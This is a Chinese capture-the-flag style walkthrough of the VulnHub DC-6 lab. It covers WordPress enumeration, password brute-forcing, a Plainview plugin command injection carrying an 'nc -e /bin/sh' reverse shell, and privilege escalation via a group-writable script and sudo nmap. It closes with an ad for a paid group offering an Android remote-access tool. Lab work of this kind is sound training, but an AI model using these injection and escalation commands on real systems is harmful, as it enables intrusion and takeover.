vulnhub靶场【DC系列】之6

admin 2025年1月9日09:58:22评论5 views字数 3172阅读10分34秒阅读模式

前言

靶机:DC-6,IP地址为192.168.10.10

攻击:kali,IP地址为192.168.10.2

都采用VMWare,网卡为桥接模式

对于文章中涉及到的靶场以及工具,我放置在公众号中,在公众号发送 dc0106 即可获取相关工具

主机发现

使用arp-scan -l或者netdiscover -r 192.168.10.1/24

因为是靶机,所以在同一局域网中,这里使用这两个工具是因为在同一局域网中的扫描速度很快

当然,如果想要模拟真实渗透,建议使用nmap等扫描工具

vulnhub靶场【DC系列】之6

使用nmap扫描192.168.10.0网段中的存活主机

nmap -sn 192.168.10.1/24
vulnhub靶场【DC系列】之6

信息收集

使用nmap扫描端口

扫描目标的全端口,以及服务和操作系统信息

nmap -sV -O 192.168.10.10 -p-
vulnhub靶场【DC系列】之6

网站信息探测

访问80端口默认界面,输入ip地址,跳转到wordy,说明可能是域名,需要进行绑定解析

vulnhub靶场【DC系列】之6

编辑/etc/hosts文件,在其中添加ip以及域名进行绑定

vulnhub靶场【DC系列】之6

再次访问网站,发现默认界面中的信息,发现CMS可能为wordpress

vulnhub靶场【DC系列】之6

使用whatweb进一步进行探测,确定为wordpress,版本为5.1.1

whatweb http://wordy
vulnhub靶场【DC系列】之6

那么这里就可以使用针对CMS为wordpress的扫描工具wpscan

wpscan --url http://wordy
vulnhub靶场【DC系列】之6

漏洞寻找

继续使用wpscan尝试进行用户名枚举,发现五个用户

wpscan --url http://wordy -e u
vulnhub靶场【DC系列】之6

尝试对这些用户进行密码爆破

wpscan --url http://wordy -e u -P /usr/share/wordlists/rockyou.txt

这里需要很长时间,所以这里再另起一个终端窗口,来做其他检测

这里进行目录扫描后,并未发现有隐藏或备份文件可用

再使用wpscan扫描插件有无漏洞可用,这里把检测模式改为具有侵略性的

wpscan --url http://wordy --detection-mode aggressive --plugins-detection aggressive -e ap

发现有三个插件,版本信息也都给出

vulnhub靶场【DC系列】之6

使用searchsploit搜索有无对应的版本漏洞,最终确定plainview插件存在,但是需要认证后才能使用该漏洞

searchsploit plainview
vulnhub靶场【DC系列】之6

但是这里还没有获取到密码,啧,这里去网上看了以下wp,确定是不是字典的问题,发现,在该靶机的主页,作者给出了提示。

[引用]

注意:您需要在渗透测试设备上编辑 hosts 文件,使其如下所示:

192.168.0.142 wordy

注意:我以 192.168.0.142 为例。您需要使用常规方法来确定 VM 的 IP 地址,并相应地进行调整。

线索 好吧,这并不是一个真正的线索,而是为那些只想继续工作的人提供的一些“我们不想花五年时间等待某个过程完成”的建议。

cat /usr/share/wordlists/rockyou.txt |grep k01 > passwords.txt 这应该可以为您节省几年时间。;-)

确实是字典问题,如果按照原本的字典,啧啧啧

重新使用wpscan进行密码爆破

#先把rockyou.txt字典中的包含k01的每一行,都重定向到当前目录下的passwords.txt文件中cat /usr/share/wordlists/rockyou.txt |grep k01 > passwords.txt#使用当前作者提示的密码本进行密码爆破wpscan --url http://wordy -e u -P passwords.txt
vulnhub靶场【DC系列】之6

爆出用户名mark和密码helpdesk01

漏洞利用

结合前面的插件漏洞,我觉得可以了,查看前面的其中一个html文件

cat /usr/share/exploitdb/exploits/php/webapps/45274.html

这是自己构造的html界面,不过这里通过访问这个插件,发现也是可行的

vulnhub靶场【DC系列】之6

这里我就不用提供的html,自己去访问靶机中的地址,然后按照顺序点击,可以看到,id命令执行成功

vulnhub靶场【DC系列】之6

那么尝试构造一个反弹shell,测试是否能够成功,在尝试进行输入时,这里的输入框进行了一个长度的限制,所以需要借助浏览器开发者工具,修改其最大长度,这里默认是15,不过想改多大就多大

vulnhub靶场【DC系列】之6

再经过测试,使用bash反弹,我这里未能成功,采用nc反弹成功获取shell

对于多种反弹shell方式,可以借助网站https://forum.ywhack.com/shell.php测试

#在输入框输入下面代码127.0.0.1|nc -e /bin/sh 192.168.10.2 9999

然后在kali中使用nc进行监听端口

#在kali中nc -lvvp 9999

然后在浏览器的界面中,点击lookup按钮,即可发现,反弹shell成功

vulnhub靶场【DC系列】之6

使用dpkg获取靶机安装的python版本

dpkg -l | grep pythonpython3 -c 'import pty;pty.spawn("/bin/bash")'
vulnhub靶场【DC系列】之6

提取

提权至用户graham

查看wordpress连接数据库的配置文件wp-config.php,不过其中的用户名并未对应到靶机内的几个用户,所以就暂时搁置,查看靶机内用户

ls -ls /homecat /etc/passwd | grep /bin/bash
vulnhub靶场【DC系列】之6

发现用户名mark,尝试使用之前获取的其密码helpdesk01进行ssh登录,发现不能登录

不过在其目录下,发现一个文件,该文件,记录了一些好东西

记录添加用户名graham,恰好这里的靶机内就有该用户,那么猜测后面的是其密码

vulnhub靶场【DC系列】之6

使用该用户graham和密码GSo7isUM1D4进行ssh登录,发现成功

vulnhub靶场【DC系列】之6

提权至用户jens

查看/home目录下的其他用户主目录,发现一个脚本文件,再使用find寻找具有SUID权限的文件

find / -type f -perm -u=s 2>/dev/null
vulnhub靶场【DC系列】之6

查看该脚本文件,发现其他用户没有修改权限,不过这个组和用户不一样,就使用groups查看一下,发现两个用户grahamjens所属同一组devs

vulnhub靶场【DC系列】之6

修改脚本文件,在其中添加/bin/bash即可,然后以jens执行sudo

sudo -u jens /home/jens/./backups.sh 
vulnhub靶场【DC系列】之6

提权至root

提权至jens后,随手测试一下sudo -l,发现无需密码,并发现提权方式了

vulnhub靶场【DC系列】之6

如果不知道如何使用nmap命令提权,可以借助网站gtfobins.github.io搜索方式

vulnhub靶场【DC系列】之6

经测试,发现--interactive并无,所以无法使用第二个进行提取

采用第一种方式进行提取,这里需要注意,使用这个提取后,「用户输入什么命令,都是不会显示的」,只会显示结果的返回

TF=$(mktemp)echo 'os.execute("/bin/bash")' > $TFsudo nmap --script=$TF
vulnhub靶场【DC系列】之6

清理痕迹这里就不说了,因为不显示输入,没什么效果

总结

该靶机主要考察以下几点:

  1. 对于网站CMS  wordpress的了解,以及针对其CMS的工具wpscan的使用
  2. 对于无可利用点的使用,密码本可能是关键点
  3. 对于插件漏洞的搜索与使用,这里借助searchsploit搜索
  4. 命令执行的利用,以及反弹shell的几种方式
  5. 文件所属者、文件所属组、以及用户所属组的关系,这会间接的确定文件的权限问题
  6. sudo的提取,指定用户,即以指定用户的身份执行,或者直接以root的身份去执行

内部帮会

大家可以加入一下我们的帮会,是真正的红队大佬创建的,里面会定时丢些网上没有的工具(比如安卓远控7.4,不过现在已经删除了,有时限,加入的记得看好时间),现在只要99就可以终身,后面人多了就会涨价了

vulnhub靶场【DC系列】之6

原文始发于微信公众号(泷羽sec-何生安全):vulnhub靶场【DC系列】之6

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月9日09:58:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub靶场【DC系列】之6https://cn-sec.com/archives/3606422.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息